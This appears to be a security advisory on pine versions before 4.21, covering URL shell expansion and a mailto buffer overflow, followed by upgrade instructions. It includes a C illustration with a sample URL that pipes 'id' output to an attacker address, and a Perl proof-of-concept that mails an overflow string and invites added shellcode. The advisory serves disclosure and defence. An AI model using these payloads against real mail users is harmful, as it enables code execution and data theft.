COMMAND

    pine

SYSTEMS AFFECTED

    Pines prior to 4.21

PROBLEM

    Jim Hebert found the following.  It was tested on 4.10 and 4.20:
    4.10 from the "Red Hat" rpm and 4.20 built from pristine sources for
    the slx build target.  Both seem equally affected.

    A certain mailing Jim received from time to time recently contained
    a url like

        http://something/some/cgi$12345

    Jim noticed that viewing the url did not seem to work right, and
    eventually figured out that the url must get close enough to a shell
    to allow environment variable expansion.

    A quick test was:

        echo 'setenv WWW www.securityfocus.com' >> .tcshrc   # define a variable
        source .tcshrc
        pine
        # then view a link in a message such as: http://$WWW
        # if the shell expands it, the viewer is sent to www.securityfocus.com

    That doesn't sound dangerous or exploitable yet, right?  Well,
    imagine your shell is bash and someone sends you an HTML formatted
    mail in which the url is long:

        "Click here for cool stuff!"

    The url is long enough that its dangerous part is elided when pine
    asks the user to confirm that they want to visit that page, and the
    url ends with something like:  ?trojan=$(shell command)

    The user says "yeah, sure, visit that page" because they never see
    the dangerous part.

    At the very least, people can put your environment variables into
    their webserver access logs.  At most, people can get you to run
    shell commands (bad enough by itself) _and_ have the output of them
    sent to them if they wish.
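    The pattern the advisory describes, shown as an added C example
    (this is not the advisory's code and not pine's source; the function
    names and the sample URLs are this example's own assumptions): a url
    interpolated into a command string for /bin/sh, a confirmation prompt
    that truncates the tail and so hides the payload, and the hardened
    alternative that execs the viewer with the url as a single argv
    element so nothing in it is ever expanded.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Characters a POSIX shell interprets in an unquoted or double-quoted
 * word: $VAR and $(cmd) expansion, backtick substitution, quoting,
 * separators, redirections, globbing and brace expansion. */
static const char SHELL_META[] = "$`\"'\\;&|<>(){}*? \t\n";

/* Returns 1 if url contains anything the shell would expand or
 * interpret, 0 otherwise. */
int url_has_shell_meta(const char *url)
{
    return strpbrk(url, SHELL_META) != NULL;
}

/* Vulnerable pattern (an illustration, not pine's source): the url is
 * pasted into a command string that is later run with /bin/sh -c.
 * Double quotes do not help; $WWW and $(...) still expand inside them.
 * Returns the length snprintf would have written. */
int build_viewer_cmdline(const char *viewer, const char *url,
                         char *out, size_t n)
{
    return snprintf(out, n, "%s \"%s\"", viewer, url);
}

/* What a confirmation prompt cut at `width` columns shows: the tail of
 * a long url, where the payload sits, is exactly what the user never
 * sees.  Keeps the first width-3 characters and appends "...". */
void prompt_truncate_tail(const char *url, size_t width, char *out, size_t n)
{
    size_t len = strlen(url);
    if (len <= width) {
        snprintf(out, n, "%s", url);
        return;
    }
    size_t keep = width > 3 ? width - 3 : 0;
    snprintf(out, n, "%.*s...", (int)keep, url);
}

/* Hardened launch: no shell at all.  The viewer receives the url as one
 * argv element, so nothing in it is expanded.  Returns the viewer's
 * exit status, or -1 on failure.  If the viewer itself might hand its
 * argument to a shell, the caller should still reject urls for which
 * url_has_shell_meta() returns 1. */
int spawn_viewer_noshell(const char *viewer, const char *url)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)viewer, (char *)url, NULL };
        execvp(viewer, argv);
        _exit(127);            /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed sample urls, modelled on the advisory's description. */
    const char *evil = "http://something/some/cgi?x=1&trojan=$(id|mail attacker@somehost)";
    const char *benign = "http://www.securityfocus.com/";
    char cmd[512], shown[64];

    build_viewer_cmdline("lynx", evil, cmd, sizeof cmd);
    printf("shell would run : %s\n", cmd);
    prompt_truncate_tail(evil, 40, shown, sizeof shown);
    printf("user is shown   : %s\n", shown);
    printf("evil has meta   : %d\n", url_has_shell_meta(evil));
    printf("benign has meta : %d\n", url_has_shell_meta(benign));
    /* spawn_viewer_noshell("lynx", benign) would exec lynx directly. */
    return 0;
}
```

    Build with `cc -Wall -o viewer viewer.c`.  Single-quoting the url in
    the command string would stop the expansion only until a url carrying
    a `'` shows up, which is why the hardened path avoids the shell
    entirely rather than trying to quote for it.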

    Fyodor added the following.  It is hard to say how careless a user
    would have to be to actually become a victim of such exploitation.
    That is not to say the bug shouldn't be fixed anyway.  If anyone's
    interested:

        #!/usr/bin/perl
        # Sends a message whose mailto: url is long enough to overflow
        # pine 4.10; "@1111" stands in for the return address (see comment).
        use strict;
        use warnings;

        my $sploit = "A" x 1078;
        $sploit .= "\@1111";   # rh 6.0/pine4.10 would love return address
                               # 0x82d4528 or higher..
        open(FOO, "| /usr/sbin/sendmail -t") or die "sendmail: $!";
        print FOO "From: bogus\@yahoo.com\nTo: victim\@somehost\n\n";
        print FOO "Mail me: mailto:$sploit";
        close(FOO);

    Pull in any shellcode you like (but mind that it should contain only
    printable characters; 0x20-0xff worked).

SOLUTION

    4.21 seems to  fix the problem  even though it's  not mentioned in
    the release notes.

    Caldera says that the proper solution is to upgrade to the latest
    packages:

        rpm -U pine-4.21-1.i386.rpm

    The upgrade packages can be found on Caldera's FTP site at:

        ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/

    The corresponding source code package can be found at:

        ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/SRPMS